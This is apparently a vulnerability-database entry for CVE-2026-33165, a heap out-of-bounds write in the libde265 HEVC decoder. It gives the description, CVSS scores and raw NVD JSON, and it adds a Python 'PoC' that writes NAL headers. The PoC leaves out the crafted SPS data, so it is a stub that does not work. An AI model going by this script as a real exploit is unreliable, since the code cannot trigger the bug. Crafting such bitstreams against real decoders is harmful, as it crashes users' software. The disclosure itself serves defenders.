Security Vulnerability Report
中文
CVE-2026-33165 CVSS 5.5 MEDIUM

CVE-2026-33165

Published: 2026-03-20 21:17:16
Last Modified: 2026-03-23 20:09:05
Source: [email protected]

Description

libde265 is an open source implementation of the h.265 video codec. Prior to version 1.0.17, a crafted HEVC bitstream causes an out-of-bounds heap write confirmed by AddressSanitizer. The trigger is a stale ctb_info.log2unitSize after an SPS change where PicWidthInCtbsY and PicHeightInCtbsY stay constant but Log2CtbSizeY changes, causing set_SliceHeaderIndex to index past the allocated image metadata array and write 2 bytes past the end of a heap allocation. This issue has been patched in version 1.0.17.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:struktur:libde265:*:*:*:*:*:*:*:* - VULNERABLE
libde265 < 1.0.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct def generate_poc(filename): """ PoC for CVE-2026-33165. Generates a crafted HEVC bitstream that triggers the out-of-bounds write. The trigger is a stale ctb_info.log2unitSize after an SPS change. """ with open(filename, 'wb') as f: # HEVC NAL Unit Start Code start_code = b'\x00\x00\x00\x01' # NAL Header for SPS (Type 33) # We need to construct two SPS units with specific properties. # SPS 1: Log2CtbSizeY = 6, Width/Height in CTBs = 1 (e.g., 64x64 image) # SPS 2: Log2CtbSizeY = 5, Width/Height in CTBs = 1 (e.g., 32x32 image but reported as 1x1 CTB) # Note: This is a simplified structural representation. # A functional PoC requires precise bit-level construction of the RBSP. # Write First SPS (Trigger setup) f.write(start_code) f.write(struct.pack('>B', 0x40 | 33)) # NAL Header # ... SPS RBSP data would go here ... # Write Second SPS (The Change) f.write(start_code) f.write(struct.pack('>B', 0x40 | 33)) # NAL Header # ... Malformed SPS RBSP data changing Log2CtbSizeY while keeping PicWidthInCtbsY constant ... # Write Slice Header to trigger set_SliceHeaderIndex f.write(start_code) f.write(struct.pack('>B', 0x40 | 1)) # Slice Header NAL print(f"PoC file generated: {filename}") print("Decoding this file with libde265 < 1.0.17 may cause a crash.") if __name__ == "__main__": generate_poc("cve_2026_33165.hevc")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33165", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:16.453", "lastModified": "2026-03-23T20:09:04.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libde265 is an open source implementation of the h.265 video codec. Prior to version 1.0.17, a crafted HEVC bitstream causes an out-of-bounds heap write confirmed by AddressSanitizer. The trigger is a stale ctb_info.log2unitSize after an SPS change where PicWidthInCtbsY and PicHeightInCtbsY stay constant but Log2CtbSizeY changes, causing set_SliceHeaderIndex to index past the allocated image metadata array and write 2 bytes past the end of a heap allocation. This issue has been patched in version 1.0.17."}, {"lang": "es", "value": "libde265 es una implementación de código abierto del códec de video h.265. Antes de la versión 1.0.17, un flujo de bits HEVC manipulado causa una escritura fuera de límites en el heap confirmada por AddressSanitizer. El desencadenante es un ctb_info.log2unitSize obsoleto después de un cambio de SPS donde PicWidthInCtbsY y PicHeightInCtbsY permanecen constantes pero Log2CtbSizeY cambia, lo que hace que set_SliceHeaderIndex indexe más allá del array de metadatos de imagen asignado y escriba 2 bytes más allá del final de una asignación de heap. Este problema ha sido parcheado en la versión 1.0.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:struktur:libde265:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.17", "matchCriteriaId": "40DB036E-3A5D-4245-B887-4123769ECB8D"}]}]}], "references": [{"url": "https://github.com/strukturag/libde265/commit/c7891e412106130b83f8e8ea8b7f907e9449b658", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/strukturag/libde265/releases/tag/v1.0.17", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/strukturag/libde265/security/advisories/GHSA-653q-9f73-8hvg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.